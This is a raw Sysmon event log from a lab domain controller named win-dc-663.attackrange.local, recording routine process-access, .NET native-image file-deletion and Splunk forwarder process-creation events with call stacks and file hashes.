21:06:58.029{4DB9351A-9F2B-60D3-C400-00000000CF01}7765616C:\Windows\System32\RuntimeBroker.exe{4DB9351A-9F49-60D3-DF00-00000000CF01}5948C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x800000000000000022825Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.964{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022824Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.964{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4405-00000000CF01}1100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022823Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.964{4DB9351A-A273-60D3-4305-00000000CF01}6436NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HJT7P0X2QM\Microsoft.CertificateServices.ServerManager.DeploymentPlugIn.ni.dll.auxMD5=188C5662288B7005CA735CFDE66D7BD3,SHA256=EC3DBAC210C6934862F873E8CF970E723776F0ABB649F59CBBCE952938A2C715,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022822Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.949{4DB9351A-A273-60D3-4305-00000000CF01}6436NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\HJT7P0X2QM\Microsoft.CertificateServices.ServerManager.DeploymentPlugIn.ni.dllMD5=E4AC7D6078A1470F5EA315AE71BEF793,SHA256=89780ADBCC831B401A41641AC11A983C14F8F0B310E5FB81C09D2B7C8D99B29A,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022821Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.886{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022820Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022819Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4305-00000000CF01}6436C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022818Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A273-60D3-4205-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MHVM03IDWT\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dll.auxMD5=CCF72535789EE65EE4064D0AD4332D29,SHA256=91217F5636A24E0A31B71CD519F5CCB76522AF7F871ABCF81B72B8C8E46D65B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022817Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=537AA3A4886E705A26510AC15083E8AC,SHA256=A1FA257CEC3E35D98FD5E475BDBD67C9C798572CA4E81559422E5C8D72D0C5DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022816Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.839{4DB9351A-A273-60D3-4205-00000000CF01}3568NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MHVM03IDWT\Microsoft.CertificateServices.PKIClient.Cmdlets.ni.dllMD5=4249B4184A4C41F13809940331890E44,SHA256=DDBDB1A8CF709B79247DE90612F5DFC1B6072306AE7C78460563904196E60491,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022815Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.777{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022814Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.746{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022813Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.746{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4205-00000000CF01}3568C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022812Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.746{4DB9351A-A273-60D3-4105-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BU4WB70AQ8\Microsoft.CertificateServices.Deployment.Common.ni.dll.auxMD5=72F7EA7049EA3AC76B643C8711ADD502,SHA256=D4FCF49AB9446DC0EE6DB201B27F1C31B25E42CBF14D57B9DB01B16E0DEB35E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022811Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.730{4DB9351A-A273-60D3-4105-00000000CF01}7052NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\BU4WB70AQ8\Microsoft.CertificateServices.Deployment.Common.ni.dllMD5=BE219B6FBFF9A95D2AC454EC873E77C6,SHA256=3F2C836AE440F5466CFF89B2C3F0B983799F07703B3126F64A1BB1D3C073EB00,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022810Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022809Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022808Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022807Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022806Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022805Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000022804Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022803Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.714{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000022802Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.588{4DB9351A-A273-60D3-3F05-00000000CF01}1324C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000022801Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000022800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A273-60D3-4105-00000000CF01}7052C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000022799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.699{4DB9351A-A273-60D3-4005-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4GWQYF1U6D\Microsoft.Build.Utilities.v4.0.ni.dll.auxMD5=2FE43DA37E0EC5C880EBECB8873F8F80,SHA256=579AE18D6D8403C140405F887124DAEF5A2E4E688F9263134ECAC81D33FC03D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000022798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:06:59.698{4DB9351A-A273-60D3-4005-00000000CF01}1688NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\4GWQYF1U6D\Microsoft.Build.Utilities.v4.0.ni.dllMD5=41B1CB5CF0943A1E95E838B88D2A9736,SHA256=9209DC06050B8B61238F83141AE98742B03DC09EDC4D600C2C2FB24C92C50D09,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000022797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 